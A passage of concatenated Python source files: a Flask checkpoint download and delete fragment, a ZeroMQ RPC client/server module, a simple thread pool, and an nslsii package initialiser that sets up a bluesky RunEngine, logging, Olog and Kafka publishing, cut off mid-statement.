z.write(model_path, os.path.basename(model_path))
model_data.seek(0)
return send_file(
model_data,
mimetype='application/zip',
as_attachment=True,
attachment_filename=f'{ckpt["ckpt_name"]}.zip',
cache_timeout=-1
)
@app.route('/checkpoints/delete/<int:checkpoint>')
@check_not_demo
def delete_checkpoint(checkpoint: int):
"""
Deletes a checkpoint file.
:param checkpoint: The id of the checkpoint to delete.
"""
db.delete_ckpt(checkpoint)
return redirect(url_for('checkpoints'))
|
vnrpc.py
|
# encoding: UTF-8
import threading
import traceback
import signal
import zmq
from msgpack import packb, unpackb
from json import dumps, loads
# Allow Ctrl-C to interrupt recv()
signal.signal(signal.SIGINT, signal.SIG_DFL)
########################################################################
class RpcObject(object):
    """
    RPC object
    Provides serialization (pack) and deserialization (unpack) interfaces for the data
    exchanged over RPC. Two tools are currently supported: json and msgpack.
    msgpack: higher performance, but usually requires installing the msgpack package;
    json: slightly lower performance but more universal, since most languages ship a built-in library.
    msgpack is therefore recommended; fall back to json when a peer language has no msgpack support.
    Other serialization tools can also be added here.
    """
    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor"""
        # Use msgpack as the default serialization tool
        self.useMsgpack()
    #----------------------------------------------------------------------
    def pack(self, data):
        """Pack data"""
        pass
    #----------------------------------------------------------------------
    def unpack(self, data):
        """Unpack data"""
        pass
    #----------------------------------------------------------------------
    def __jsonPack(self, data):
        """Pack with json"""
        return dumps(data)
    #----------------------------------------------------------------------
    def __jsonUnpack(self, data):
        """Unpack with json"""
        return loads(data)
    #----------------------------------------------------------------------
    def __msgpackPack(self, data):
        """Pack with msgpack"""
        return packb(data)
    #----------------------------------------------------------------------
    def __msgpackUnpack(self, data):
        """Unpack with msgpack"""
        return unpackb(data)
    #----------------------------------------------------------------------
    def useJson(self):
        """Use json as the serialization tool"""
        self.pack = self.__jsonPack
        self.unpack = self.__jsonUnpack
    #----------------------------------------------------------------------
    def useMsgpack(self):
        """Use msgpack as the serialization tool"""
        self.pack = self.__msgpackPack
        self.unpack = self.__msgpackUnpack
########################################################################
class RpcServer(RpcObject):
    """RPC server"""
    #----------------------------------------------------------------------
    def __init__(self, repAddress, pubAddress):
        """Constructor"""
        super(RpcServer, self).__init__()
        # Dict holding the callable functions: key is the function name, value is the function object
        self.__functions = {}
        # zmq sockets
        self.__context = zmq.Context()
        self.__socketREP = self.__context.socket(zmq.REP) # request-reply socket
        self.__socketREP.bind(repAddress)
        self.__socketPUB = self.__context.socket(zmq.PUB) # data broadcast socket
        self.__socketPUB.bind(pubAddress)
        # Worker thread
        self.__active = False # server running flag
        self.__thread = threading.Thread(target=self.__run) # server worker thread
    #----------------------------------------------------------------------
    def start(self):
        """Start the server"""
        # Mark the server as running
        self.__active = True
        # Start the worker thread
        self.__thread.start()
    #----------------------------------------------------------------------
    def stop(self):
        """Stop the server"""
        # Mark the server as stopped
        self.__active = False
        # Wait for the worker thread to exit
        self.__thread.join()
    #----------------------------------------------------------------------
    def __run(self):
        """Main server loop"""
        while self.__active:
            # Receive request data from the request-reply socket
            reqb = self.__socketREP.recv()
            # Deserialize
            req = self.unpack(reqb)
            # Extract the function name and arguments
            name, args, kwargs = req
            # Look up the registered function and call it; catch any exception and return the traceback
            try:
                func = self.__functions[name]
                r = func(*args, **kwargs)
                rep = [True, r]
            except Exception as e:
                rep = [False, traceback.format_exc()]
            # Serialize
            repb = self.pack(rep)
            # Return the call result over the request-reply socket
            self.__socketREP.send(repb)
    #----------------------------------------------------------------------
    def publish(self, topic, data):
        """
        Broadcast data to subscribers
        topic: topic name
        data: the payload
        """
        # Serialize the data
        datab = self.pack(data)
        # Send the data over the broadcast socket
        self.__socketPUB.send_multipart([topic, datab])
    #----------------------------------------------------------------------
    def register(self, func):
        """Register a function"""
        self.__functions[func.__name__] = func
########################################################################
class RpcClient(RpcObject):
    """RPC client"""
    #----------------------------------------------------------------------
    def __init__(self, reqAddress, subAddress):
        """Constructor"""
        super(RpcClient, self).__init__()
        # zmq sockets
        self.__reqAddress = reqAddress
        self.__subAddress = subAddress
        self.__context = zmq.Context()
        self.__socketREQ = self.__context.socket(zmq.REQ) # request socket
        self.__socketSUB = self.__context.socket(zmq.SUB) # broadcast subscription socket
        # Worker thread, handles data pushed by the server
        self.__active = False # client running flag
        self.__thread = threading.Thread(target=self.__run) # client worker thread
    #----------------------------------------------------------------------
    def __getattr__(self, name):
        """Implement remote procedure calls"""
        # Perform the remote call
        def dorpc(*args, **kwargs):
            # Build the request
            req = [name, args, kwargs]
            # Serialize the request
            reqb = self.pack(req)
            # Send the request and wait for the reply
            self.__socketREQ.send(reqb)
            repb = self.__socketREQ.recv()
            # Deserialize the reply
            rep = self.unpack(repb)
            # Return the result on success; raise an exception if the remote call failed
            if rep[0]:
                return rep[1]
            else:
                raise RemoteException(rep[1])
        return dorpc
    #----------------------------------------------------------------------
    def start(self):
        """Start the client"""
        # Connect the sockets
        self.__socketREQ.connect(self.__reqAddress)
        self.__socketSUB.connect(self.__subAddress)
        # Mark the client as running
        self.__active = True
        # Start the worker thread
        self.__thread.start()
    #----------------------------------------------------------------------
    def stop(self):
        """Stop the client"""
        # Mark the client as stopped
        self.__active = False
        # Wait for the worker thread to exit
        self.__thread.join()
    #----------------------------------------------------------------------
    def __run(self):
        """Main client loop"""
        while self.__active:
            # Receive broadcast data from the subscription socket
            topic, datab = self.__socketSUB.recv_multipart()
            # Deserialize
            data = self.unpack(datab)
            # Hand the data to the callback
            self.callback(topic, data)
    #----------------------------------------------------------------------
    def callback(self, topic, data):
        """Callback function; must be implemented by the user"""
        raise NotImplementedError
    #----------------------------------------------------------------------
    def subscribe(self, topic):
        """
        Subscribe to broadcast data for a specific topic
        Use topic='' to subscribe to all topics
        """
        self.__socketSUB.setsockopt(zmq.SUBSCRIBE, topic)
########################################################################
class RemoteException(Exception):
"""RPC远程异常"""
#----------------------------------------------------------------------
def __init__(self, value):
"""Constructor"""
self.__value = value
#----------------------------------------------------------------------
def __str__(self):
"""输出错误信息"""
return self.__value
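########################################################################
# Minimal usage sketch (an assumption for illustration, not part of the original module).
# Addresses and the topic are placeholders; a real client should subclass RpcClient and
# override callback() to handle broadcast data.
#
#   server = RpcServer('tcp://*:2014', 'tcp://*:2015')
#   server.register(some_function)              # expose some_function to clients
#   server.start()
#   server.publish(b'topic', {'key': 'value'})  # push data to all subscribers
#
#   client = RpcClient('tcp://localhost:2014', 'tcp://localhost:2015')
#   client.subscribe(b'')                       # empty topic subscribes to everything
#   client.start()
#   result = client.some_function(1, 2)         # remote call resolved via __getattr__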
|
ThreadPool.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import queue
import threading
import contextlib
import time
import traceback
StopEvent = object()
class ThreadPool(object):
def __init__(self, max_num):
        self.q = queue.Queue()  # queue holding submitted tasks
        self.max_num = max_num  # maximum number of concurrent threads
        self.terminal = False  # if True, terminate all threads and stop fetching new tasks
        self.generate_list = []  # threads that have been created
        self.free_list = []  # idle threads
        # self.run_sum_time=0
    def run(self, func, args, callback=None):
        """
        Submit a task to the thread pool.
        :param func: task function
        :param args: arguments for the task function
        :param callback: callback executed after the task succeeds or fails; it receives two
            arguments: 1. the task's execution status, 2. the task's return value
            (default is None, i.e. no callback is executed)
        :return: True if the thread pool has been terminated, otherwise None
        """
        if len(self.free_list) == 0 and len(self.generate_list) < self.max_num:  # no idle threads and below the maximum thread count
            self.generate_thread()  # create a thread
        w = (func, args, callback,)  # pack the parameters into a tuple
        self.q.put(w)  # add to the task queue
        # self.run_sum_time+=1
    def generate_thread(self):
        """
        Create a worker thread.
        """
        t = threading.Thread(target=self.call)
        t.start()
    def call(self):
        """
        Loop to fetch tasks from the queue and execute them.
        """
        current_thread = threading.currentThread()  # get the current thread object
        self.generate_list.append(current_thread)  # add it to the list of created threads
        event = self.q.get()  # fetch a task
        while event != StopEvent:  # as long as it is not the stop signal
            func, arguments, callback = event  # unpack the task tuple
            try:
                result = func(*arguments)  # run the function and store its result
                status = True  # execution succeeded
            except Exception as e:
                status = False  # execution failed
                result = traceback.format_exc()  # the result is the error traceback
            if callback is not None:  # if a callback was provided
                try:
                    callback(status, result)  # execute the callback
                except Exception as e:
                    # print("Callback error: " + str(traceback.format_exc()))
                    pass
            if self.terminal:  # False by default; set to True by terminate()
                event = StopEvent  # stop signal
            else:
                # self.free_list.append(current_thread)  # task finished, add to the idle list
                # event = self.q.get()  # fetch a task
                # self.free_list.remove(current_thread)  # after getting a task, remove from the idle list
                with self.worker_state(self.free_list, current_thread):
                    event = self.q.get()
        else:
            self.generate_list.remove(current_thread)  # stop signal received: remove from the list of created threads
    def close(self):  # stop the worker threads once queued tasks are done
        num = len(self.generate_list)  # number of created threads
        while num:
            self.q.put(StopEvent)  # add one stop signal per created thread
            num -= 1
    # Terminate the threads (and clear the queue)
    def terminate(self):
        self.terminal = True  # switch to True
        while self.generate_list:  # while created threads are still alive
            self.q.put(StopEvent)  # send one stop signal per remaining thread
        self.q.empty()  # note: Queue.empty() only checks emptiness; it does not actually clear the queue
@contextlib.contextmanager
def worker_state(self, free_list, current_thread):
free_list.append(current_thread)
try:
yield
finally:
free_list.remove(current_thread)
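# Minimal usage sketch (an assumption for illustration, not part of the original module):
#
#   def task(i):
#       return i * i
#
#   def on_done(status, result):
#       # status is True/False; result is the return value or the error traceback
#       print(status, result)
#
#   pool = ThreadPool(5)
#   for i in range(20):
#       pool.run(task, (i,), callback=on_done)
#   pool.close()  # let worker threads exit once the queued tasks are finished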
|
__init__.py
|
from distutils.version import LooseVersion
import logging
from logging.handlers import SysLogHandler, TimedRotatingFileHandler
import os
from pathlib import Path
import sys
import queue
import threading
import uuid
import warnings
import appdirs
from IPython import get_ipython
from ._version import get_versions
__version__ = get_versions()["version"]
del get_versions
bluesky_log_file_path = None
def import_star(module, ns):
def public(name):
return not name.startswith("_")
ns.update({name: getattr(module, name) for name in dir(module) if public(name)})
def configure_base(
user_ns,
broker_name,
*,
bec=True,
bec_derivative=False,
epics_context=False,
magics=True,
mpl=True,
configure_logging=True,
pbar=True,
ipython_logging=True,
publish_documents_to_kafka=False,
tb_minimize=True,
):
"""
Perform base setup and instantiation of important objects.
This factory function instantiates essential objects to data collection
environments at NSLS-II and adds them to the current namespace. In some
cases (documented below), it will check whether certain variables already
exist in the user name space, and will avoid creating them if so. The
following are added:
* ``RE`` -- a RunEngine
This is created only if an ``RE`` instance does not currently exist in
the namespace.
    * ``db`` -- a Broker (from "databroker"), subscribed to ``RE``
* ``bec`` -- a BestEffortCallback, subscribed to ``RE``
* ``peaks`` -- an alias for ``bec.peaks``
* ``sd`` -- a SupplementalData preprocessor, added to ``RE.preprocessors``
    * ``pbar_manager`` -- a ProgressBarManager, set as the ``RE.waiting_hook``
And it performs some low-level configuration:
* creates a context in ophyd's control layer (``ophyd.setup_ophyd()``)
* turns on interactive plotting (``matplotlib.pyplot.ion()``)
* bridges the RunEngine and Qt event loops
(``bluesky.utils.install_kicker()``)
* logs ERROR-level log message from ophyd to the standard out
Parameters
----------
user_ns: dict
a namespace --- for example, ``get_ipython().user_ns``
broker_name : Union[str, Broker]
Name of databroker configuration or a Broker instance.
bec : boolean, optional
True by default. Set False to skip BestEffortCallback.
bec_derivative : boolean, optional
False by default. Set True to enable derivative and its stats
calculation in BestEffortCallback.
epics_context : boolean, optional
        False by default. Set True to create a context in ophyd's control layer via ``setup_ophyd()``.
magics : boolean, optional
True by default. Set False to skip registration of custom IPython
magics.
mpl : boolean, optional
        True by default. Set False to skip matplotlib ``ion()`` and event-loop
        bridging.
configure_logging : boolean, optional
True by default. Set False to skip INFO-level logging.
pbar : boolean, optional
        True by default. Set False to skip ProgressBarManager.
ipython_logging : boolean, optional
True by default. Console output and exception stack traces will be
written to IPython log file when IPython logging is enabled.
publish_documents_to_kafka: boolean, optional
False by default. If True publish bluesky documents to a Kafka message broker
tb_minimize : boolean, optional
        True by default. If True, IPython is configured to print 'minimal' tracebacks (``%xmode minimal``).
Returns
-------
names : list
list of names added to the namespace
Examples
--------
Configure IPython for CHX.
>>>> configure_base(get_ipython().user_ns, 'chx');
"""
ipython = get_ipython()
ns = {} # We will update user_ns with this at the end.
# Protect against double-subscription.
SENTINEL = "__nslsii_configure_base_has_been_run"
if user_ns.get(SENTINEL):
raise RuntimeError("configure_base should only be called once per process.")
ns[SENTINEL] = True
# Set up a RunEngine and use metadata backed by files on disk.
from bluesky import RunEngine, __version__ as bluesky_version
if LooseVersion(bluesky_version) >= LooseVersion("1.6.0"):
# current approach using PersistentDict
from bluesky.utils import PersistentDict
directory = os.path.expanduser("~/.config/bluesky/md")
os.makedirs(directory, exist_ok=True)
md = PersistentDict(directory)
else:
# legacy approach using HistoryDict
from bluesky.utils import get_history
md = get_history()
# if RunEngine already defined grab it
# useful when users make their own custom RunEngine
if "RE" in user_ns:
RE = user_ns["RE"]
else:
RE = RunEngine(md)
ns["RE"] = RE
# Set up SupplementalData.
# (This is a no-op until devices are added to it,
# so there is no need to provide a 'skip_sd' switch.)
from bluesky import SupplementalData
sd = SupplementalData()
RE.preprocessors.append(sd)
ns["sd"] = sd
if isinstance(broker_name, str):
# Set up a Broker.
from databroker import Broker
db = Broker.named(broker_name)
ns["db"] = db
else:
db = broker_name
RE.subscribe(db.insert)
if pbar:
# Add a progress bar.
from bluesky.utils import ProgressBarManager
pbar_manager = ProgressBarManager()
RE.waiting_hook = pbar_manager
ns["pbar_manager"] = pbar_manager
if magics:
# Register bluesky IPython magics.
from bluesky.magics import BlueskyMagics
if ipython:
ipython.register_magics(BlueskyMagics)
if bec:
# Set up the BestEffortCallback.
from bluesky.callbacks.best_effort import BestEffortCallback
_bec_kwargs = {}
if bec_derivative:
_bec_kwargs["calc_derivative_and_stats"] = True
_bec = BestEffortCallback(**_bec_kwargs)
RE.subscribe(_bec)
ns["bec"] = _bec
ns["peaks"] = _bec.peaks # just as alias for less typing
if mpl:
# Import matplotlib and put it in interactive mode.
import matplotlib.pyplot as plt
ns["plt"] = plt
plt.ion()
# Make plots update live while scans run.
if LooseVersion(bluesky_version) < LooseVersion("1.6.0"):
from bluesky.utils import install_kicker
install_kicker()
if epics_context:
# Create a context in the underlying EPICS client.
from ophyd import setup_ophyd
setup_ophyd()
if configure_logging:
configure_bluesky_logging(ipython=ipython)
if ipython_logging and ipython:
from nslsii.common.ipynb.logutils import log_exception
# IPython logging will be enabled with logstart(...)
configure_ipython_logging(exception_logger=log_exception, ipython=ipython)
if publish_documents_to_kafka:
_build_and_subscribe_kafka_publisher(
RE,
beamline_name=broker_name,
bootstrap_servers=os.environ['BLUESKY_KAFKA_BOOTSTRAP_SERVERS'],
producer_config={
"acks": 0,
"message.timeout.ms": 3000,
"queue.buffering.max.kbytes": 10 * 1048576, # default is 1048576
"compression.codec": "snappy"
},
)
if tb_minimize and ipython:
# configure %xmode minimal
# so short tracebacks are printed to the console
ipython.magic("xmode minimal")
# convenience imports
# some of the * imports are for 'back-compatibility' of a sort -- we have
# taught BL staff to expect LiveTable and LivePlot etc. to be in their
# namespace
import numpy as np
ns["np"] = np
import bluesky.callbacks
ns["bc"] = bluesky.callbacks
import_star(bluesky.callbacks, ns)
import bluesky.plans
ns["bp"] = bluesky.plans
import_star(bluesky.plans, ns)
import bluesky.plan_stubs
ns["bps"] = bluesky.plan_stubs
import_star(bluesky.plan_stubs, ns)
    # special-case the commonly-used mv / mvr and their aliases mov / movr
ns["mv"] = bluesky.plan_stubs.mv
ns["mvr"] = bluesky.plan_stubs.mvr
ns["mov"] = bluesky.plan_stubs.mov
ns["movr"] = bluesky.plan_stubs.movr
import bluesky.preprocessors
ns["bpp"] = bluesky.preprocessors
import bluesky.callbacks.broker
import_star(bluesky.callbacks.broker, ns)
import bluesky.simulators
import_star(bluesky.simulators, ns)
user_ns.update(ns)
return list(ns)
def configure_bluesky_logging(ipython, appdirs_appname="bluesky", propagate_log_messages=False):
"""
Configure a TimedRotatingFileHandler log handler and attach it to
bluesky, ophyd, caproto, and nslsii loggers. In addition, by default set
the ``propagate`` field on each logger to ``False`` so log messages will
not propagate to higher level loggers such as a root logger configured
by a user. If you want log messages from these loggers to propagate to
higher level loggers simply set ``propagate_log_messages=True`` when
calling this function, or set the ``propagate`` field to ``True`` in
client code.
The log file path is taken from environment variable BLUESKY_LOG_FILE, if
that variable has been set. If not the default log file location is determined
by the appdirs package. The default log directory will be created if it does
not exist.
Parameters
----------
ipython: InteractiveShell
IPython InteractiveShell used to attach bluesky log handler to ipython
appdirs_appname: str
appname passed to appdirs.user_log_dir() when the BLUESKY_LOG_FILE
environment variable has not been set; use the default for production,
set to something else for testing
propagate_log_messages: bool
the ``propagate`` field on the bluesky, caproto, nslsii, ophyd, and ipython
loggers will be set to this value; if False (the default) log messages
from these loggers will not propagate to higher-level loggers
(such as a root logger)
Returns
-------
bluesky_log_file_path: Path
log file path
"""
global bluesky_log_file_path
if "BLUESKY_LOG_FILE" in os.environ:
bluesky_log_file_path = Path(os.environ["BLUESKY_LOG_FILE"])
print(
f"bluesky log file path configured from environment variable"
f" BLUESKY_LOG_FILE: '{bluesky_log_file_path}'",
file=sys.stderr,
)
else:
bluesky_log_dir = Path(appdirs.user_log_dir(appname=appdirs_appname))
if not bluesky_log_dir.exists():
bluesky_log_dir.mkdir(parents=True, exist_ok=True)
bluesky_log_file_path = bluesky_log_dir / Path("bluesky.log")
print(
f"environment variable BLUESKY_LOG_FILE is not set,"
f" using default log file path '{bluesky_log_file_path}'",
file=sys.stderr,
)
logging_handlers = []
log_file_handler = TimedRotatingFileHandler(
filename=str(bluesky_log_file_path), when="W0", backupCount=10
)
log_file_handler.setLevel("INFO")
log_file_format = (
"[%(levelname)1.1s %(asctime)s.%(msecs)03d %(name)s"
" %(module)s:%(lineno)d] %(message)s"
)
log_file_handler.setFormatter(logging.Formatter(fmt=log_file_format))
logging_handlers.append(log_file_handler)
def build_syslog_handler(address):
syslog_handler = SysLogHandler(address=address)
syslog_handler.setLevel(logging.INFO)
# no need to log date and time, systemd does that
formatter = logging.Formatter(
"%(name)s[%(process)s]: %(levelname)s - %(module)s:%(lineno)d] %(message)s"
)
# add formatter to syslog_handler
syslog_handler.setFormatter(formatter)
return syslog_handler
if Path("/dev/log").exists():
logging_handlers.append(build_syslog_handler(address="/dev/log"))
elif Path("/var/run/syslog").exists():
logging_handlers.append(build_syslog_handler(address="/var/run/syslog"))
else:
        # syslog is not available
pass
for logger_name in ("bluesky", "caproto", "ophyd", "nslsii"):
logger = logging.getLogger(logger_name)
for logging_handler in logging_handlers:
logger.addHandler(logging_handler)
logger.setLevel("INFO")
logger.propagate = propagate_log_messages
if ipython:
for logging_handler in logging_handlers:
ipython.log.addHandler(logging_handler)
ipython.log.setLevel("INFO")
ipython.log.propagate = propagate_log_messages
return bluesky_log_file_path
def configure_ipython_logging(
exception_logger, ipython, rotate_file_size=100000, appdirs_appname="bluesky"
):
"""
Configure IPython output logging with logstart and IPython exception logging with set_custom_exc(...).
Set a custom exception logging function and execute logstart.
The log file path is taken from environment variable BLUESKY_IPYTHON_LOG_FILE, if
    that variable has been set. If not, the default log file location is determined
by the appdirs package.
Parameters
----------
exception_logger: function f(ipyshell, etype, evalue, tb, tb_offset=None) -> list
a function that will handle logging exceptions
ipython: InteractiveShell
IPython InteractiveShell into which the specified exception_logger will be installed
rotate_file_size: int, optional
        at the time configure_ipython_logging() is called, if there exists a log file
with size in bytes greater than or equal to rotate_file_size, the existing file will
be renamed and a new log file will be created
appdirs_appname: str
appname passed to appdirs.user_log_dir(); use the default for production,
set to something else for testing
Returns
-------
bluesky_ipython_log_file_path: Path
log file path
"""
# install the specified function to log exceptions
ipython.set_custom_exc((BaseException,), exception_logger)
if "BLUESKY_IPYTHON_LOG_FILE" in os.environ:
bluesky_ipython_log_file_path = Path(os.environ["BLUESKY_IPYTHON_LOG_FILE"])
print(
"bluesky ipython log file configured from environment"
f" variable BLUESKY_IPYTHON_LOG_FILE: '{bluesky_ipython_log_file_path}'",
file=sys.stderr,
)
else:
bluesky_ipython_log_dir = Path(appdirs.user_log_dir(appname=appdirs_appname))
if not bluesky_ipython_log_dir.exists():
bluesky_ipython_log_dir.mkdir(parents=True, exist_ok=True)
bluesky_ipython_log_file_path = bluesky_ipython_log_dir / Path(
"bluesky_ipython.log"
)
print(
"environment variable BLUESKY_IPYTHON_LOG_FILE is not set,"
f" using default file path '{bluesky_ipython_log_file_path}'",
file=sys.stderr,
)
# before starting ipython logging check the size of the ipython log file
# if the ipython log file has grown large make a copy and start a new one
# if a previous copy exists just overwrite it
if (
bluesky_ipython_log_file_path.exists()
and os.path.getsize(bluesky_ipython_log_file_path) >= rotate_file_size
):
bluesky_ipython_log_file_path.rename(
str(bluesky_ipython_log_file_path) + ".old"
)
# ipython gives a warning if logging fails to start, for example if the log
# directory does not exist. Convert that warning to an exception here.
with warnings.catch_warnings():
warnings.simplefilter(action="error")
# specify the file for ipython logging output
ipython.magic(f"logstart -o -t {bluesky_ipython_log_file_path} append")
return bluesky_ipython_log_file_path
def configure_olog(user_ns, *, callback=None, subscribe=True):
"""
Setup a callback that publishes some metadata from the RunEngine to Olog.
Also, add the public contents of pyOlog.ophyd_tools to the namespace.
This is expected to be run after :func:`configure_base`. It expects to find
an instance of RunEngine named ``RE`` in the user namespace. Additionally,
if the user namespace contains the name ``logbook``, that is expected to be
an instance ``pyOlog.SimpleOlogClient``.
Parameters
----------
user_ns: dict
a namespace --- for example, ``get_ipython().user_ns``
callback : callable, optional
a hook for customizing the logbook_cb_factory; if None a default is
used
subscribe : boolean, optional
True by default. Set to False to skip the subscription. (You still get
pyOlog.ophyd_tools.)
Returns
-------
names : list
list of names added to the namespace
Examples
--------
Configure the Olog.
>>>> configure_olog(get_ipython().user_ns);
"""
# Conceptually our task is simple: add a subscription to the RunEngine that
# publishes to the Olog using the Python wrapper of its REST API, pyOlog.
    # In practice this is messy because we have to deal with the many-layered API
# of pyOlog and, more importantly, ensure that slowness or errors from the
# Olog do not affect the run. Historically the Olog deployment has not been
# reliable, so it is important to be robust against these issues. Of
# course, by ignoring Olog errors, we leave gaps in the log, which is not
# great, but since all data is saved to a databroker anyway, we can always
# re-generate them later.
ns = {} # We will update user_ns with this at the end.
from bluesky.callbacks.olog import logbook_cb_factory
from functools import partial
from pyOlog import SimpleOlogClient
import queue
import threading
from warnings import warn
# This is for pyOlog.ophyd_tools.get_logbook, which simply looks for
# a variable called 'logbook' in the global IPython namespace.
if "logbook" in user_ns:
simple_olog_client = user_ns["logbook"]
else:
simple_olog_client = SimpleOlogClient()
ns["logbook"] = simple_olog_client
if subscribe:
if callback is None:
# list of logbook names to publish to
LOGBOOKS = ("Data Acquisition",)
generic_logbook_func = simple_olog_client.log
configured_logbook_func = partial(generic_logbook_func, logbooks=LOGBOOKS)
callback = logbook_cb_factory(configured_logbook_func)
def submit_to_olog(queue, cb):
while True:
name, doc = queue.get() # waits until document is available
try:
cb(name, doc)
except Exception as exc:
warn(
"This olog is giving errors. This will not be logged."
"Error:" + str(exc)
)
olog_queue = queue.Queue(maxsize=100)
olog_thread = threading.Thread(
target=submit_to_olog, args=(olog_queue, callback), daemon=True
)
olog_thread.start()
def send_to_olog_queue(name, doc):
try:
olog_queue.put((name, doc), block=False)
except queue.Full:
warn("The olog queue is full. This will not be logged.")
RE = user_ns["RE"]
RE.subscribe(send_to_olog_queue, "start")
import pyOlog.ophyd_tools
import_star(pyOlog.ophyd_tools, ns)
user_ns.update(ns)
return list(ns)
def migrate_metadata():
"""
Copy metadata from (old) sqlite-backed file to (new) directory of msgpack.
"""
from bluesky.utils import get_history, PersistentDict
old_md = get_history()
directory = os.path.expanduser("~/.config/bluesky/md")
os.makedirs(directory, exist_ok=True)
new_md = PersistentDict(directory)
new_md.update(old_md)
def _subscribe_kafka_publisher(RE, publisher_queue, kafka_publisher, publisher_queue_timeout=1):
"""
Set up an indirect connection between RE and Kafka publisher using a queue and a thread.
The function performs two tasks:
1) define function put_document_on_publisher_queue and subscribe it to the RE
2) define function publish_documents_from_publisher_queue and run it in a thread
This function is not intended for use outside this module.
Parameters
----------
RE: bluesky RunEngine
documents published by this RE will be published as Kafka messages
publisher_queue: queue.Queue
a RunEngine will place (name, document) tuples on this queue
kafka_publisher: bluesky_kafka.Publisher
publishes (name, document) tuples as Kafka messages on a beamline-specific topic
publisher_queue_timeout: float
time in seconds to wait for a document to become available on the publisher_queue
before checking if the publisher thread should terminate; default is 1s
Returns
-------
put_document_re_token
RE subscription token corresponding to put_document_on_publisher_queue
publisher_thread
threading.Thread responsible for running function publish_documents_from_publisher_queue
publisher_thread_stop_event
call set() on this threading.Event to terminate publisher_thread
"""
def put_document_on_publisher_queue(name_, document_):
"""
This function is intended to be subscribed to a RunEngine.
When a RunEngine publishes a (name, document) tuple this
function puts that tuple on publisher_queue. It is expected
that a function running on a separate thread will take
(name, document) tuples off publisher_queue and publish them
as Kafka messages.
Parameters
----------
name_: str
bluesky document name such as "start", "descriptor", etc.
document_: dict
bluesky document dictionary
"""
publisher_queue.put((name_, document_))
def publish_documents_from_publisher_queue(
publisher_queue_,
kafka_publisher_,
publisher_thread_stop_event_,
publisher_queue_timeout_=1,
):
"""
This function is intended to execute in a dedicated thread. It defines
a polling loop that takes (name, document) tuples from publisher_queue_
as they become available and uses kafka_publisher_ to publish those
tuples as Kafka messages on a beamline-specific topic.
The intention is to separate a RunEngine from a Publisher in order
to insulate plans from Publisher failures that might otherwise interrupt
data collection.
Parameters
----------
publisher_queue_: queue.Queue
a RunEngine will place (name, document) tuples on this queue
kafka_publisher_: bluesky_kafka.Publisher
publishes (name, document) tuples as Kafka messages on a beamline-specific topic
publisher_thread_stop_event_: threading.Event
the polling loop will terminate cleanly if publisher_thread_stop_event_ is set
publisher_queue_timeout_: float
time in seconds to wait for a document to become available on the publisher_queue_
before checking if publisher_thread_stop_event_ has been set
"""
name_ = None
document_ = None
published_document_count = 0
nslsii_logger = logging.getLogger("nslsii")
nslsii_logger.info("starting Kafka message publishing loop")
while not publisher_thread_stop_event_.is_set():
try:
name_, document_ = publisher_queue_.get(timeout=publisher_queue_timeout_)
kafka_publisher_(name_, document_)
published_document_count += 1
except queue.Empty:
# publisher_queue_.get() timed out waiting for a new document
# the while condition will now be checked to see if someone
# has requested that this thread terminate
# if not then try again to get a new document from publisher_queue_
pass
except BaseException:
# something bad happened while trying to publish a Kafka message
# log the exception and continue taking documents from publisher_queue_
nslsii_logger.exception(
"an error occurred after %d successful Kafka messages when '%s' "
"attempted to publish on topic %s\nname: '%s'\ndoc '%s'",
published_document_count,
kafka_publisher_,
kafka_publisher_.topic,
name_,
document_,
)
publisher_thread_stop_event = threading.Event()
publisher_thread = threading.Thread(
name="kafka-publisher-thread",
target=publish_documents_from_publisher_queue,
args=(publisher_queue, kafka_publisher, publisher_thread_stop_event, publisher_queue_timeout),
daemon=True
)
publisher_thread.start()
nslsii_logger = logging.getLogger("nslsii")
nslsii_logger.info("Kafka publisher thread has started")
put_document_re_token = RE.subscribe(put_document_on_publisher_queue)
return put_document_re_token, publisher_thread, publisher_thread_stop_event
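# Illustrative sketch only (not part of the original module): how a caller
# might shut down the machinery returned by _subscribe_kafka_publisher. The
# RE, token, thread and event arguments are assumed to come from an earlier
# call to that function.
def _example_stop_kafka_publisher(RE, token, publisher_thread, stop_event):
    # Stop feeding new documents onto the publisher queue ...
    RE.unsubscribe(token)
    # ... ask the polling loop to exit after its current timeout ...
    stop_event.set()
    # ... and wait for the publisher thread to finish.
    publisher_thread.join()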
def _build_and_subscribe_kafka_publisher(RE, beamline_name, bootstrap_servers, producer_config, publisher_queue_timeout=1):
"""
Create and start a separate thread to publish bluesky documents as Kafka
messages on a beamline-specific topic.
This function performs three tasks:
1) verify a Kafka broker with the expected beamline-specific topic is available
2) instantiate a bluesky_kafka.Publisher with the expected beamline-specific topic
3) delegate connecting the RunEngine and Publisher to _subscribe_kafka_publisher
Parameters
----------
RE: RunEngine
the RunEngine to which the RunRouter will be subscribed
beamline_name: str
beamline name, for example "csx", to be used in building the
Kafka topic to which messages will be published
bootstrap_servers: str
Comma-delimited list of Kafka server addresses or hostnames and ports as a string
such as ``'kafka1:9092,kafka2:9092'``
producer_config: dict
dictionary of Kafka Producer configuration settings
Returns
-------
topic: str
the Kafka topic on which bluesky documents will be published, for example
"csx.bluesky.runengine.documents"
publisher_thread_stop_event: threading.Event
call set() on this threading.Event to terminate the Kafka publisher thread
publisher_thread_re_token: int
RunEngine subscription token corresponding to the function subscribed to the RunEngine
that places (name, document) tuples on the publisher queue. This token is needed to
un-subscribe the function from the RunEngine, in case someone ever wants to do that.
"""
from bluesky_kafka import BlueskyKafkaException, Publisher
from bluesky_kafka.utils import list_topics
nslsii_logger = logging.getLogger("nslsii")
publisher_queue = queue.Queue()
beamline_runengine_topic = None
kafka_publisher_token = None
publisher_thread_stop_event = None
try:
nslsii_logger.info(
"connecting to Kafka broker(s): '%s'", bootstrap_servers
)
beamline_runengine_topic = f"{beamline_name.lower()}.bluesky.runengine.documents"
# verify the topic for this beamline exists on the Kafka broker(s)
topic_to_topic_metadata = list_topics(bootstrap_servers=bootstrap_servers)
if beamline_runengine_topic in topic_to_topic_metadata:
# the beamline topic exists
kafka_publisher = Publisher(
topic=beamline_runengine_topic,
bootstrap_servers=bootstrap_servers,
key=str(uuid.uuid4()),
producer_config=producer_config,
flush_on_stop_doc=True
)
kafka_publisher_token, kafka_publisher_thread, publisher_thread_stop_event = _subscribe_kafka_publisher(
RE=RE,
publisher_queue=publisher_queue,
kafka_publisher=kafka_publisher,
publisher_queue_timeout=publisher_queue_timeout
)
nslsii_logger.info("RunEngine will publish bluesky documents on Kafka topic '%s'", beamline_runengine_topic)
else:
raise BlueskyKafkaException(
